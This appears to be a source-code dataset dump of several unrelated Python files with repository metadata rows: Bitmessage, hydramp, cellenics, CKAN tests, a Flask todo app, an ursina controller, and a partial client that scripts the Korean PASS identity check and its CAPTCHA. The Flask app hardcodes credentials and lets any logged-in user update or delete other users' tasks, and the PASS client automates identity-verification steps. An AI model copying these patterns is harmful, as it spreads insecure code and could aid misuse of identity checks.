os.dup2(se.fileno(), sys.stderr.fileno())
if parentPid:
# signal ready
os.kill(parentPid, signal.SIGTERM)
os.kill(grandfatherPid, signal.SIGTERM)
@staticmethod
def setSignalHandler():
"""Setting the Signal Handler"""
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
# signal.signal(signal.SIGINT, signal.SIG_DFL)
@staticmethod
def usage():
"""Displaying the usages"""
print('Usage: ' + sys.argv[0] + ' [OPTIONS]')
print('''
Options:
-h, --help show this help message and exit
-c, --curses use curses (text mode) interface
-d, --daemon run in daemon (background) mode
-t, --test dryrun, make testing
All parameters are optional.
''')
@staticmethod
def stop():
"""Stop main application"""
with printLock:
            print('Stopping Bitmessage Daemon.')
shutdown.doCleanShutdown()
# .. todo:: nice function but no one is using this
@staticmethod
def getApiAddress():
"""This function returns API address and port"""
if not BMConfigParser().safeGetBoolean(
'bitmessagesettings', 'apienabled'):
return None
address = BMConfigParser().get('bitmessagesettings', 'apiinterface')
port = BMConfigParser().getint('bitmessagesettings', 'apiport')
return {'address': address, 'port': port}
def main():
"""Triggers main module"""
mainprogram = Main()
mainprogram.start()
if __name__ == "__main__":
main()
# So far, the creation of and management of the Bitmessage protocol and this
# client is a one-man operation. Bitcoin tips are quite appreciated.
# 1H5XaDA6fYENLbknwZyjiYXYPQaFjjLX2u
| 36.293763 | 79 | 0.581328 |
4a27fa3cc31c48f3def1383e05bed2d84b896810 | 3,836 | py | Python | amp/data_utils/csv.py | szczurek-lab/hydramp | be4eb6defe227fe3fef4fe9882a85a0b717301c6 | [
"MIT"
] | 4 | 2022-03-04T15:57:24.000Z | 2022-03-24T11:13:01.000Z | amp/data_utils/csv.py | szczurek-lab/hydramp | be4eb6defe227fe3fef4fe9882a85a0b717301c6 | [
"MIT"
] | null | null | null | amp/data_utils/csv.py | szczurek-lab/hydramp | be4eb6defe227fe3fef4fe9882a85a0b717301c6 | [
"MIT"
] | 1 | 2022-03-07T16:44:11.000Z | 2022-03-07T16:44:11.000Z | import csv
from sklearn.model_selection import train_test_split
from amp.data_utils import sequence
MIN_LENGTH = 0
INPUT_PATH = 'data/interim/Uniprot_0_200_no_duplicates.csv'
class CSVSplitter:
"""Perform splitting csv file in training, test and validation subsets."""
def __init__(
self,
input_file,
min_length,
max_length,
output_to='data/processed',
        test_size: float = 0.1,
        val_size: float = 0.1,
):
self.input_file = input_file
self.name = f'{output_to}/Uniprot_{min_length}_{max_length}'
self.test_size = test_size + val_size
self.val_size = val_size / self.test_size
def get_row_count(self):
with open(self.input_file) as f:
return sum(1 for line in f)
def get_indices(self):
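        """Randomly assign each data row index to the train, test or val split."""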
row_count = self.get_row_count()
partition = {}
indices_train, indices_test = train_test_split(
range(1, row_count + 1),
test_size=self.test_size,
random_state=1
)
indices_test, indices_val = train_test_split(
indices_test,
test_size=self.val_size,
random_state=1
)
for i in indices_train:
partition[i] = 'train'
for i in indices_test:
partition[i] = 'test'
for i in indices_val:
partition[i] = 'val'
# partition['train'] = indices_train
# partition['test'] = indices_test
# partition['val'] = indices_val
return partition
def csv_partition(self, indices):
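        """Write every input row to the train, test or val CSV chosen by its split label."""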
train_file = f'{self.name}_train.csv'
test_file = f'{self.name}_test.csv'
val_file = f'{self.name}_val.csv'
with open(self.input_file) as csv_input, \
open(train_file, 'w') as csv_train, \
open(test_file, 'w') as csv_test, \
open(val_file, 'w') as csv_val:
reader = csv.reader(csv_input)
train_writer = csv.writer(csv_train)
test_writer = csv.writer(csv_test)
val_writer = csv.writer(csv_val)
train_writer.writerow(['Name', 'Sequence'])
test_writer.writerow(['Name', 'Sequence'])
val_writer.writerow(['Name', 'Sequence'])
for line_number, row in enumerate(reader):
if line_number == 0:
continue
if indices[line_number] == 'train':
train_writer.writerow(row)
elif indices[line_number] == 'test':
test_writer.writerow(row)
else:
val_writer.writerow(row)
def split(self):
partition = self.get_indices()
self.csv_partition(partition)
def get_various_lengths_csv(
        max_lengths: list,
        min_length: int = MIN_LENGTH,
        input_path=INPUT_PATH,
        output_to='data/interim',
):
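    """Write one CSV per maximum length, keeping only sequences whose length lies within [min_length, max_len]."""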
    list_of_outputs = [f'{output_to}/Uniprot_{min_length}_{max_len}.csv' for max_len in max_lengths]
with open(input_path) as input_file:
reader = csv.reader(input_file)
writers = []
output_files = []
for file_name in list_of_outputs:
file = open(file_name, 'w')
output_files.append(file)
writers.append(csv.writer(file))
# Write headers in each file
for writer in writers:
writer.writerow(['Name', 'Sequence'])
for line_number, row in enumerate(reader):
if line_number == 0:
continue
seq = row[1]
for writer, max_len in zip(writers, max_lengths):
if sequence.check_length(seq, min_length, max_len):
writer.writerow(row)
for file in output_files:
file.close() | 30.204724 | 100 | 0.570647 |
4a27fdeb6bc3828e758ef6e52c8b7e33bd457611 | 2,278 | py | Python | python/src/worker/tasks/dotplot.py | hms-dbmi-cellenics/worker | 9eb9f9823e0c194384a207c56ffcc487873a481a | [
"MIT"
] | 1 | 2022-03-28T10:28:53.000Z | 2022-03-28T10:28:53.000Z | python/src/worker/tasks/dotplot.py | hms-dbmi-cellenics/worker | 9eb9f9823e0c194384a207c56ffcc487873a481a | [
"MIT"
] | 30 | 2022-01-12T20:32:18.000Z | 2022-03-25T08:08:26.000Z | python/src/worker/tasks/dotplot.py | hms-dbmi-cellenics/worker | 9eb9f9823e0c194384a207c56ffcc487873a481a | [
"MIT"
] | 1 | 2022-03-07T12:00:12.000Z | 2022-03-07T12:00:12.000Z | import json
import backoff
import requests
from aws_xray_sdk.core import xray_recorder
from exceptions import raise_if_error
from ..config import config
from ..helpers.s3 import get_cell_sets
from ..result import Result
from ..tasks import Task
class DotPlot(Task):
def __init__(self, msg):
super().__init__(msg)
self.experiment_id = config.EXPERIMENT_ID
def _format_result(self, result):
        # Wrap the task output in a Result object.
return Result(result)
def _format_request(self):
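        """Build the runDotPlot request from the experiment's cell sets."""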
# getting cell ids for the groups we want to display.
cellSets = get_cell_sets(self.experiment_id)
# Getting the cell ids for subsetting the seurat object with a group of cells.
groupByCellSet = [
cellSet
for cellSet in cellSets
if cellSet["key"] == self.task_def["groupBy"]
][0]
filterBy = self.task_def["filterBy"]
applyFilter = filterBy["group"].lower() != "all"
filterByCellSet = groupByCellSet
if applyFilter:
children = [
cellSet for cellSet in cellSets if cellSet["key"] == filterBy["group"]
][0]["children"]
filterByCellSet = [
child for child in children if child["key"] == filterBy["key"]
][0]
request = {
"useMarkerGenes": self.task_def["useMarkerGenes"],
"numberOfMarkers": self.task_def["numberOfMarkers"],
"customGenesList": self.task_def["customGenesList"],
"groupBy": groupByCellSet,
"filterBy": filterByCellSet,
"applyFilter": applyFilter,
}
return request
@xray_recorder.capture("DotPlot.compute")
@backoff.on_exception(
backoff.expo, requests.exceptions.RequestException, max_time=30
)
def compute(self):
request = self._format_request()
response = requests.post(
f"{config.R_WORKER_URL}/v0/runDotPlot",
headers={"content-type": "application/json"},
data=json.dumps(request),
)
response.raise_for_status()
result = response.json()
raise_if_error(result)
data = result.get("data")
return self._format_result(data)
| 28.835443 | 86 | 0.615013 |
4a27ff974c8404908d66290e12fe1f87d84be8ad | 11,091 | py | Python | ckan/tests/legacy/__init__.py | hackhit/ckan | 53b9442509b46525d653f2f705e98319752ceb2d | [
"BSD-3-Clause"
] | 6 | 2015-11-09T00:44:51.000Z | 2019-11-21T14:56:01.000Z | ckan/tests/legacy/__init__.py | hackhit/ckan | 53b9442509b46525d653f2f705e98319752ceb2d | [
"BSD-3-Clause"
] | 39 | 2015-02-18T17:32:23.000Z | 2022-03-11T18:03:36.000Z | ckan/tests/legacy/__init__.py | hackhit/ckan | 53b9442509b46525d653f2f705e98319752ceb2d | [
"BSD-3-Clause"
] | 17 | 2015-03-13T18:05:05.000Z | 2020-11-06T13:55:32.000Z | # encoding: utf-8
"""Pylons application test package
When the test runner finds and executes tests within this directory,
this file will be loaded to setup the test environment.
It registers the root directory of the project in sys.path and
pkg_resources, in case the project hasn't been installed with
setuptools.
"""
import os
from unittest import TestCase
import pytest
from ckan.common import config
from six import text_type
from ckan.lib.create_test_data import CreateTestData
from ckan.lib import search
import ckan.lib.helpers as h
import ckan.model as model
import ckan.tests.helpers as helpers
# evil hack as url_for is passed out
url_for = h.url_for
__all__ = [
"url_for",
"TestController",
"CreateTestData",
"TestSearchIndexer",
"CheckMethods",
"CommonFixtureMethods",
"TestCase",
"CkanServerCase",
"call_action_api",
"BaseCase",
"here_dir",
"conf_dir",
"is_datastore_supported",
]
here_dir = os.path.dirname(os.path.abspath(__file__))
conf_dir = os.path.dirname(os.path.dirname(here_dir))
class BaseCase(object):
def setup(self):
pass
def teardown(self):
pass
@staticmethod
def _system(cmd):
import commands
(status, output) = commands.getstatusoutput(cmd)
if status:
raise Exception("Couldn't execute cmd: %s: %s" % (cmd, output))
@classmethod
def _paster(cls, cmd, config_path_rel):
config_path = os.path.join(config["here"], config_path_rel)
cls._system("paster --plugin ckan %s --config=%s" % (cmd, config_path))
class CommonFixtureMethods(BaseCase):
@classmethod
def create_package(self, data={}, **kwds):
# Todo: A simpler method for just creating a package.
CreateTestData.create_arbitrary(package_dicts=[data or kwds])
@classmethod
def create_user(cls, **kwds):
user = model.User(name=kwds["name"])
model.Session.add(user)
model.Session.commit()
model.Session.remove()
return user
@staticmethod
def get_package_by_name(package_name):
return model.Package.by_name(package_name)
@staticmethod
def get_group_by_name(group_name):
return model.Group.by_name(group_name)
@staticmethod
def get_user_by_name(name):
return model.User.by_name(name)
@staticmethod
def get_tag_by_name(name):
return model.Tag.by_name(name)
def purge_package_by_name(self, package_name):
package = self.get_package_by_name(package_name)
if package:
package.purge()
model.repo.commit_and_remove()
@classmethod
def purge_packages(cls, pkg_names):
for pkg_name in pkg_names:
pkg = model.Package.by_name(text_type(pkg_name))
if pkg:
pkg.purge()
model.repo.commit_and_remove()
@classmethod
def purge_all_packages(self):
all_pkg_names = [
pkg.name for pkg in model.Session.query(model.Package)
]
self.purge_packages(all_pkg_names)
def purge_group_by_name(self, group_name):
group = self.get_group_by_name(group_name)
if group:
group.purge()
model.repo.commit_and_remove()
@classmethod
def clear_all_tst_ratings(self):
ratings = (
model.Session.query(model.Rating)
.filter_by(package=model.Package.by_name(u"annakarenina"))
.all()
)
ratings += (
model.Session.query(model.Rating)
.filter_by(package=model.Package.by_name(u"warandpeace"))
.all()
)
for rating in ratings[:]:
model.Session.delete(rating)
model.repo.commit_and_remove()
@property
def war(self):
return self.get_package_by_name(u"warandpeace")
@property
def anna(self):
return self.get_package_by_name(u"annakarenina")
@property
def roger(self):
return self.get_group_by_name(u"roger")
@property
def david(self):
return self.get_group_by_name(u"david")
@property
def russian(self):
return self.get_tag_by_name(u"russian")
@property
def tolstoy(self):
return self.get_tag_by_name(u"tolstoy")
@property
def flexible_tag(self):
return self.get_tag_by_name(u"Flexible \u30a1")
class CheckMethods(BaseCase):
def assert_true(self, value):
assert value, "Not true: '%s'" % value
def assert_false(self, value):
assert not value, "Not false: '%s'" % value
def assert_equal(self, value1, value2):
assert value1 == value2, "Not equal: %s" % ((value1, value2),)
def assert_isinstance(self, value, check):
assert isinstance(value, check), "Not an instance: %s" % (
(value, check),
)
def assert_raises(self, exception_class, callable, *args, **kwds):
try:
callable(*args, **kwds)
except exception_class:
pass
else:
assert False, "Didn't raise '%s' when calling: %s with %s" % (
exception_class,
callable,
(args, kwds),
)
def assert_contains(self, sequence, item):
assert item in sequence, "Sequence %s does not contain item: %s" % (
sequence,
item,
)
def assert_missing(self, sequence, item):
assert item not in sequence, "Sequence %s does contain item: %s" % (
sequence,
item,
)
def assert_len(self, sequence, count):
assert len(sequence) == count, "Length of sequence %s was not %s." % (
sequence,
count,
)
def assert_isinstance(self, object, kind):
assert isinstance(
object, kind
), "Object %s is not an instance of %s." % (object, kind)
class TestCase(CommonFixtureMethods, CheckMethods, BaseCase):
def setup(self):
super(TestCase, self).setup()
self.conditional_create_common_fixtures()
def teardown(self):
self.reuse_or_delete_common_fixtures()
        super(TestCase, self).teardown()
class WsgiAppCase(BaseCase):
app = helpers._get_test_app()
def config_abspath(file_path):
if os.path.isabs(file_path):
return file_path
return os.path.join(conf_dir, file_path)
class CkanServerCase(BaseCase):
@classmethod
def _recreate_ckan_server_testdata(cls, config_path):
cls._paster("db clean", config_path)
cls._paster("db init", config_path)
cls._paster("create-test-data", config_path)
cls._paster("search-index rebuild", config_path)
@staticmethod
def _start_ckan_server(config_file=None):
if not config_file:
config_file = config["__file__"]
config_path = config_abspath(config_file)
import subprocess
process = subprocess.Popen(["paster", "serve", config_path])
return process
@staticmethod
def _stop_ckan_server(process):
pid = process.pid
pid = int(pid)
if os.system("kill -9 %d" % pid):
raise Exception(
"Can't kill foreign CKAN instance (pid: %d)." % pid
)
class TestController(
CommonFixtureMethods, CkanServerCase, WsgiAppCase, BaseCase
):
def assert_equal(self, left, right):
assert left == right
def assert_not_equal(self, left, right):
assert left != right
def clear_language_setting(self):
self.app.cookies = {}
class TestSearchIndexer:
"""
Tests which use search can use this object to provide indexing
Usage:
self.tsi = TestSearchIndexer()
(create packages)
self.tsi.index()
(do searching)
"""
def __init__(self):
from ckan import plugins
if not is_search_supported():
pytest.skip("Search not supported")
plugins.load("synchronous_search")
@classmethod
def index(cls):
pass
@classmethod
def list(cls):
return [
model.Package.get(pkg_index.package_id).name
for pkg_index in model.Session.query(model.PackageSearch)
]
def setup_test_search_index():
# from ckan import plugins
if not is_search_supported():
pytest.skip("Search not supported")
search.clear_all()
# plugins.load('synchronous_search')
def is_search_supported():
is_supported_db = not model.engine_is_sqlite()
return is_supported_db
def are_foreign_keys_supported():
return not model.engine_is_sqlite()
def is_datastore_supported():
# we assume that the datastore uses the same db engine that ckan uses
is_supported_db = model.engine_is_pg()
return is_supported_db
def clear_flash(res=None):
messages = h._flash.pop_messages()
class StatusCodes:
STATUS_200_OK = 200
STATUS_201_CREATED = 201
STATUS_400_BAD_REQUEST = 400
STATUS_403_ACCESS_DENIED = 403
STATUS_404_NOT_FOUND = 404
STATUS_409_CONFLICT = 409
def call_action_api(app, action, apikey=None, status=200, **kwargs):
"""POST an HTTP request to the CKAN API and return the result.
Any additional keyword arguments that you pass to this function as **kwargs
are posted as params to the API.
Usage:
package_dict = post(app, 'package_create', apikey=apikey,
name='my_package')
assert package_dict['name'] == 'my_package'
num_followers = post(app, 'user_follower_count', id='annafan')
If you are expecting an error from the API and want to check the contents
of the error dict, you have to use the status param otherwise an exception
will be raised:
error_dict = post(app, 'group_activity_list', status=403,
id='invalid_id')
assert error_dict['message'] == 'Access Denied'
:param app: the test app to post to
:param action: the action to post to, e.g. 'package_create'
:type action: string
:param apikey: the API key to put in the Authorization header of the post
(optional, default: None)
:type apikey: string
:param status: the HTTP status code expected in the response from the CKAN
API, e.g. 403, if a different status code is received an exception will
be raised (optional, default: 200)
:type status: int
:param **kwargs: any other keyword arguments passed to this function will
be posted to the API as params
:returns: the 'result' or 'error' dictionary from the CKAN API response
:rtype: dictionary
"""
response = app.post(
"/api/action/{0}".format(action),
json=kwargs,
extra_environ={"Authorization": str(apikey)},
status=status,
)
assert (
"/api/3/action/help_show?name={0}".format(action)
in response.json["help"]
)
if status in (200,):
assert response.json["success"] is True
return response.json["result"]
else:
assert response.json["success"] is False
return response.json["error"]
| 26.985401 | 79 | 0.640339 |
4a280053f3eae39c7a31fec9a24c61660db7340b | 4,846 | py | Python | app.py | Darepapi/flask_todo_app | 742c23b0518e2563abc9dd5cffcf00fa33fe812c | [
"Unlicense",
"MIT"
] | 1 | 2020-07-22T03:01:21.000Z | 2020-07-22T03:01:21.000Z | app.py | Darepapi/flask_todo_app | 742c23b0518e2563abc9dd5cffcf00fa33fe812c | [
"Unlicense",
"MIT"
] | null | null | null | app.py | Darepapi/flask_todo_app | 742c23b0518e2563abc9dd5cffcf00fa33fe812c | [
"Unlicense",
"MIT"
] | null | null | null | from flask import Flask, render_template, request, redirect, flash, url_for, flash
from flask_mysqldb import MySQL
from werkzeug.security import generate_password_hash,check_password_hash
from flask_login import LoginManager, UserMixin, login_required, login_user, logout_user, current_user
from datetime import timedelta
#Database connection
app = Flask(__name__)
app.config['MYSQL_HOST'] = 'localhost'
app.config['MYSQL_DB'] = 'todo_db'
app.config['MYSQL_USER'] = 'root'
app.config['MYSQL_PASSWORD'] = 'root'
app.config['SECRET_KEY'] = 'thisismysecretkey'
mysql = MySQL(app)
#flask-login user class
class User(UserMixin):
def __init__(self, name, id):
self.name = name
self.id = id
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.login_message = 'Please login.'
#Ask user to login if session expired already
@login_manager.unauthorized_handler
def unauthorized():
flash("Please login.")
return render_template('login.html')
@app.route("/update", methods=['POST','GET'])
def update():
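    """Update an existing task's text, identified by its database row id."""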
cur = mysql.connection.cursor()
newTask = request.form['updated-task']
old_id = request.form["old_id"]
cur.execute('UPDATE user_task SET task=%s WHERE id=%s',[newTask,int(old_id)])
mysql.connection.commit()
return redirect(url_for("index"))
# Query the database and load the user on every request
@login_manager.user_loader
def load_user(user_id):
cur = mysql.connection.cursor()
cur.execute(""" SELECT * FROM users WHERE id=%s """,[int(user_id)])
currentUser = cur.fetchone()
if currentUser:
return User(id=currentUser[0],name=currentUser[1])
else:
return
@app.route("/login", methods=["GET","POST"])
def login():
if request.method == "GET":
return render_template("login.html")
elif request.method == "POST":
cur = mysql.connection.cursor()
username = request.form['username']
password = request.form['password']
        # Query the database to check whether the user is registered
cur.execute(""" SELECT * FROM users
WHERE name=%s""",[username])
newUser = cur.fetchone()
if newUser:
password_check = check_password_hash(newUser[2], password)
if password_check:
user = User(id=newUser[0],name=newUser[1])
login_user(user, remember=True, duration=timedelta(seconds=10))
return redirect(url_for("index"))
flash('Incorrect password! Please try again')
return render_template('login.html')
flash("Invalid username! Please try again")
return render_template('login.html')
@app.route("/signup", methods=["GET", "POST"])
def signUp():
cur = mysql.connection.cursor()
if request.method == "GET":
return render_template("signup.html")
elif request.method == "POST":
username = request.form['username']
mail = request.form['mail']
password = generate_password_hash(request.form['password'])
        # Confirm whether the user already exists; if not, add them to the database and redirect to the login page
cur.execute(""" SELECT * FROM users WHERE name=%s OR email=%s """,[username, mail])
user_exist = cur.fetchall()
if user_exist:
            # Username or email already taken; prompt for another
flash("Username or mail taken already, Try again")
return redirect(url_for('signUp'))
else:
            # On successful registration, the user is redirected to the login page and asked to log in with the new details
flash("You have been registered! Kindly log in")
cur.execute(""" INSERT INTO users (name, password, email)
VALUES(%s,%s,%s) """,[username,password,mail])
mysql.connection.commit()
return redirect(url_for('login'))
@app.route("/", methods=["POST","GET"])
@login_required
def index():
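    """GET: list the current user's tasks; POST: create a new task for the current user."""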
if request.method == 'GET':
cur = mysql.connection.cursor()
cur.execute('SELECT id,task FROM user_task WHERE user_id=%s',[int(current_user.id)])
return render_template("index.html",tasklist=cur.fetchall())
task = request.form['newtask']
cur = mysql.connection.cursor()
cur.execute("INSERT INTO user_task(task, user_id) VALUES(%s,%s)",[task,current_user.id])
mysql.connection.commit()
return redirect(url_for('index'))
@app.route('/logout',methods=['GET'])
@login_required
def logout():
logout_user()
return redirect(url_for('login'))
@app.route("/delete/<string:task>",methods=['GET'])
@login_required
def delete(task):
cur = mysql.connection.cursor()
cur.execute('DELETE FROM user_task WHERE task=%s',[task])
mysql.connection.commit()
return redirect(url_for('index'))
if __name__ == "__main__":
app.run()
| 32.743243 | 110 | 0.657656 |
4a28006d71a4b46910ee03915c3b5797bc3b3c8c | 4,829 | py | Python | ursina/prefabs/first_person_controller.py | flipcoder/ursina | f761ccd69160d0bef5d13e7b34ca55d66d54b523 | [
"MIT"
] | null | null | null | ursina/prefabs/first_person_controller.py | flipcoder/ursina | f761ccd69160d0bef5d13e7b34ca55d66d54b523 | [
"MIT"
] | null | null | null | ursina/prefabs/first_person_controller.py | flipcoder/ursina | f761ccd69160d0bef5d13e7b34ca55d66d54b523 | [
"MIT"
] | 1 | 2020-10-03T03:44:16.000Z | 2020-10-03T03:44:16.000Z | from ursina import *
class FirstPersonController(Entity):
def __init__(self, **kwargs):
super().__init__()
self.speed = 5
self.cursor = Entity(parent=camera.ui, model='quad', color=color.pink, scale=.008, rotation_z=45)
self.position = (0, 1, 1)
camera.position = self.position
camera.rotation = (0,0,0)
camera.fov = 90
mouse.locked = True
self.mouse_sensitivity = Vec2(40, 40)
self.target_smoothing = 100
self.smoothing = self.target_smoothing
self.grounded = False
self.jump_height = 2
self.jump_duration = .5
self.jumping = False
self.air_time = 0
for key, value in kwargs.items():
setattr(self, key ,value)
def update(self):
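        """Per-frame update: mouse look, keyboard movement, wall probing and simple gravity."""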
self.rotation_y += mouse.velocity[0] * self.mouse_sensitivity[1]
camera.rotation_x -= mouse.velocity[1] * self.mouse_sensitivity[0]
camera.rotation_x = clamp(camera.rotation_x, -90, 90)
self.y += held_keys['e']
self.y -= held_keys['q']
self.direction = Vec3(
self.forward * (held_keys['w'] - held_keys['s'])
+ self.right * (held_keys['d'] - held_keys['a'])
).normalized()
self.smoothing = lerp(self.smoothing, self.target_smoothing, 4*time.dt)
camera.position = lerp(
camera.position,
self.position + (self.up*1.5),
self.smoothing / 100)
camera.rotation_y = self.rotation_y
origin = self.world_position + (self.up*.5) + (self.direction/2)
middle_ray = raycast(origin , self.direction, ignore=[self,], distance=.25, debug=False)
left_ray = raycast(origin, lerp(self.left, self.forward, .125), ignore=[self,], distance=1.4, debug=False)
right_ray = raycast(origin, lerp(self.right, self.forward, .125), ignore=[self,], distance=1.4, debug=False)
# push away from the wall
# if left_ray.hit:
# self.smoothing = 2
# self.position -= lerp(self.left, self.forward, .5) * (1.399-left_ray.distance)
#
# elif right_ray.hit:
# self.smoothing = 2
# self.position -= lerp(self.right, self.forward, .5) * (1.399-right_ray.distance)
if not middle_ray.hit:
self.position += self.direction * self.speed * time.dt
# gravity
ray = boxcast(self.world_position+(0,.05,0), self.down, ignore=(self, ), thickness=.9)
if ray.distance <= .1:
if not self.grounded:
self.land()
self.grounded = True
# self.y = ray.world_point[1]
return
else:
self.grounded = False
# if not on ground and not on way up in jump, fall
if not self.grounded:
self.y -= min(self.air_time, ray.distance-.05)
self.air_time += time.dt*.25
def input(self, key):
if key == 'space':
self.jump()
def jump(self):
if not self.grounded:
return
self.grounded = False
self.animate_y(self.y+self.jump_height, self.jump_duration, resolution=120, curve=curve.out_expo)
invoke(self.start_fall, delay=self.jump_duration)
def start_fall(self):
self.y_animator.pause()
self.jumping = False
def land(self):
# print('land')
self.air_time = 0
self.grounded = True
if __name__ == '__main__':
from ursina.prefabs.first_person_controller import FirstPersonController
# window.vsync = False
app = Ursina()
Sky(color=color.gray)
ground = Entity(model='plane', scale=(100,1,100), color=color.yellow.tint(-.2), texture='white_cube', texture_scale=(100,100), collider='box')
e = Entity(model='cube', scale=(1,5,10), x=2, y=.01, rotation_y=45, collider='box', texture='white_cube')
e.texture_scale = (e.scale_z, e.scale_y)
e = Entity(model='cube', scale=(1,5,10), x=-2, y=.01, collider='box', texture='white_cube')
e.texture_scale = (e.scale_z, e.scale_y)
player = FirstPersonController(y=1)
player.gun = None
gun = Button(parent=scene, model='cube', color=color.blue, origin_y=-.5, position=(3,0,3), collider='box')
gun.on_click = Sequence(Func(setattr, gun, 'parent', camera), Func(setattr, player, 'gun', gun))
def input(key):
if key == 'left mouse down' and player.gun:
gun.blink(color.orange)
bullet = Entity(parent=gun, model='cube', scale=.1, color=color.black)
bullet.world_parent = scene
bullet.animate_position(bullet.position+(bullet.forward*50), curve=curve.linear, duration=1)
destroy(bullet, delay=1)
# Entity(model='cube', color=color.dark_gray, scale=(9,4,9), y=-.5, collider='box')
app.run()
| 34.248227 | 146 | 0.595154 |
4a2800fafde3d27a45b0b84b7f79108c370b3dd3 | 2,223 | py | Python | stopwatch.py | sgmoratilla/genetic-drawing | 60c29b8f1fb07f24ea45941b8a8f90773ae30347 | [
"MIT"
] | 2 | 2021-02-15T00:26:37.000Z | 2022-03-06T14:01:02.000Z | stopwatch.py | sgmoratilla/genetic-drawing | 60c29b8f1fb07f24ea45941b8a8f90773ae30347 | [
"MIT"
] | null | null | null | stopwatch.py | sgmoratilla/genetic-drawing | 60c29b8f1fb07f24ea45941b8a8f90773ae30347 | [
"MIT"
] | 1 | 2021-09-28T17:45:41.000Z | 2021-09-28T17:45:41.000Z | """
MIT License
Copyright (c) 2018 Free TNT
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import time
# Ported from https://github.com/dirigeants/klasa/blob/master/src/lib/util/Stopwatch.js
class StopWatch:
def __init__(self):
self._start = time.perf_counter()
self._end = None
@property
def duration(self):
return self._end - self._start if self._end else time.perf_counter() - self._start
@property
def running(self):
return not self._end
def restart(self):
self._start = time.perf_counter()
self._end = None
return self
def reset(self):
self._start = time.perf_counter()
self._end = self._start
return self
def start(self):
if not self.running:
self._start = time.perf_counter() - self.duration
self._end = None
return self
def stop(self):
if self.running:
self._end = time.perf_counter()
return self
def __str__(self):
time = self.duration * 1000
if time >= 1000:
return "{:.2f}s".format(time / 1000)
if time >= 1:
return "{:.2f}ms".format(time)
return "{:.2f}μs".format(time * 1000)
| 32.691176 | 90 | 0.68466 |
4a2801b760511374e550ecf85d560ee10c0b00fa | 5,240 | py | Python | src/koncert/main.py | jiwonMe/k-on-cert | acf6cc608489a8af766955238678c1bff7adf7dd | [
"MIT"
] | null | null | null | src/koncert/main.py | jiwonMe/k-on-cert | acf6cc608489a8af766955238678c1bff7adf7dd | [
"MIT"
] | null | null | null | src/koncert/main.py | jiwonMe/k-on-cert | acf6cc608489a8af766955238678c1bff7adf7dd | [
"MIT"
] | null | null | null | import re
import requests
import pprint
import time
import json
from bs4 import BeautifulSoup as bs
from io import BytesIO
import base64
from requests.sessions import Session
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
class PASSAgent:
"""
    PASS identity verification agent
"""
_data: dict = {}
_session: Session
_menu_id: str
_timestamp: int
def _get_menu_id(self, response: str) -> str:
"""`menuId`값 getter
주어진 response에서 `menuId` 값 64글자를 리턴합니다
Args:
response (response): requests.get/post의 응답 결과
Returns:
menu_id (str): `menuId` 값
"""
data = response.text
menu_id = re.search(
r'menuId\s{0,}=\s{0,}"([a-z\d]{64})"', data).group(1)
return menu_id
def get_data(self):
return pprint.pformat(self._data)
def __init__(self, session: Session = Session()):
self._session = session
def start(self, encode_data):
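        """Open a CheckPlus (NICE) verification session with the given EncodeData payload and store the returned menuId."""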
self._data.update({"encode_data": encode_data})
res = self._session.post(
"https://nice.checkplus.co.kr/CheckPlusSafeModel/service.cb", data={
"m": "checkplusSerivce",
"EncodeData": encode_data
})
self._menu_id = self._get_menu_id(res)
return res.text
def check_by_sms(self, mno, name, birth, sex, mobile_number):
"""sms 본인확인
Args:
mno (str): 통신사
name (str): 실명
birth (digit[6]): YYMMDD형식의 생년월일
sex (digit): 성별(주민등록번호 뒤 7자리 중 첫번째 숫자)
mobile_number (numbers): 휴대폰 번호(no hyphen'-')
Returns:
(str): 응답 텍스트
"""
data = {
"m": "authMobile01",
"mobileAuthType": "SMS",
"nciInfo": "",
"menuId": self._menu_id,
"mobileco": mno,
"agree": "on", # 전체 동의
"agree1": "Y", # 개인정보이용동의
"agree2": "Y", # 고유식별정보처리동의
"agree3": "Y", # 서비스이용약관동의
"agree4": "Y", # 통신사이용약관동의
}
self._data.update({
"name": name,
"birth": birth,
"sex": sex,
"mobile_number": mobile_number
})
res = self._session.post(
"https://nice.checkplus.co.kr/CheckPlusSafeModel/service.cb", data=data)
self._menu_id = self._get_menu_id(res)
        # Extract and store the BDC_VCID_CAPTCHA value
html = res.text
soup = bs(html, 'html.parser')
self._data.update({
"BDC_DATA": {
"BDC_VCID_CAPTCHA": soup.find(
'input', {'name': 'BDC_VCID_CAPTCHA'}).attrs['value']
}
})
return res.text
def get_captcha(self, mode="image"):
"""bot detect captcha image/sound request
Args:
mode (str, optional): [description]. Defaults to "image".
Returns:
[type]: [description]
"""
url = "https://nice.checkplus.co.kr/botdetectcaptcha"
self._timestamp = int(time.time())
# GET p
res = self._session.get(url, params={
"get": "p",
"c": "CAPTCHA",
"t": self._data
.get("BDC_DATA")
.get("BDC_VCID_CAPTCHA"),
"d": self._timestamp
})
        p_data = json.loads(res.text)  # convert p_data to a dictionary
self._data.get("BDC_DATA").update({
"BDC_Hs_CAPTCHA": p_data.get("hs"),
"BDC_SP_CAPTCHA": p_data.get("sp"),
})
# GET image/sound
res = self._session.get(url, params={
"get": mode, # image or sound
"c": "CAPTCHA",
"t": self._data
.get("BDC_DATA")
.get("BDC_VCID_CAPTCHA"),
"d": self._timestamp
})
# base64 encoded image
image = BytesIO(res.content).read()
b64image = base64.b64encode(image)
return b64image
def check_captcha(self, answer: str):
"""CAPTCHA validation request
Args:
answer (str): [description]
"""
